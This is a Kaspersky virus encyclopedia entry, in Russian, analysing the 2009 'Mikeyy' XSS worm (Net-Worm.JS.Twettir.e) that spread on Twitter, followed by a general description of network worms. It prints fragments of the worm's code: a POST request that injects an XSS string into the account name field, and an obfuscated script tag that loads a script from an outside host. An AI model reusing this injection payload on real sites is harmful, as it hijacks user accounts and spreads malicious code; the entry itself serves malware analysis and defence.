RSS-каналы
Уровень опасности: 1
Net-Worm.JS.Twettir.e
| Время детектирования | 14 апр 2009 05:57 MSK |
| Время выпуска обновления | 14 апр 2009 10:01 MSK |
| Описание опубликовано | 22 апр 2009 12:21 MSK |
Технические детали
Net-Worm.JS.Twettir.eСемейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.
Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.
Основной функционал червей содержится в трех функциях:
- XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
- Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
- Wait – содержит вредоносный функционал.
Рассылаемые сообщения:
"Twitter, your community is going to be mad at you... - Mikeyy";
"This worm is getting out of hand Twitter. - Mikeyy";
"RT!! 4th gen #Mikeyy worm on the loose! Click here to protect
yourself: http://tinyurl.com/cojc6s";
"This is all Twitters fault! Don't blame Mikeyy!!";
"ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT:
http://bit.ly/4ywBID";
"How TO remove new Mikeyy worm! RT!! http://bit.ly/yCL1s";
В данном варианте у пользователей изменяется параметр user[name] :
var ajaxConn1 = new XHConn(); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Sa ve");
Значение изменяемого параметра вычисляется в следующем фрагменте:
randomXSS[0] = '"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,3 2,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,10 0,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,11 4,105,112,116,62));</script>';
var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];
var xss = urlencode(genXSS);
Это приводит к добавлению к странице пользователя следующей ссылки на скрипт:
Также червь изменяет параметры пользователя на следующие:
в результате чего у зараженного пользователя меняется имя аккаунта и фон его страницы.
Вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению в компьютерных сетях.
Отличительной особенностью данного типа червей является отсутствие необходимости в пользователе как в звене в цепочке распространения (т.е., непосредственно для активации вредоносной программы).
Зачастую при распространении такой червь ищет в сети компьютеры, на которых используется программное обеспечение, содержащее критические уязвимости. Для заражения уязвимых компьютеров червь посылает специально сформированный сетевой пакет (эксплойт), в результате чего код (или часть кода) червя проникает на компьютер-жертву и активируется. Если сетевой пакет содержит только часть кода червя, то после проникновения в уязвимый компьютер он скачивает основной файл червя и запускает его на исполнение.
Можно встретить сетевых червей данного типа, использующих сразу несколько эксплойтов для своего распространения, что увеличивает скорость нахождения ими компьютера-жертвы.
© ЗАО «Лаборатория Касперского», 1997-2010
Ведущий производитель систем защиты от вирусов, спама и хакерских атак
Зарегистрированные товарные знаки и знаки обслуживания являются собственностью их правообладателей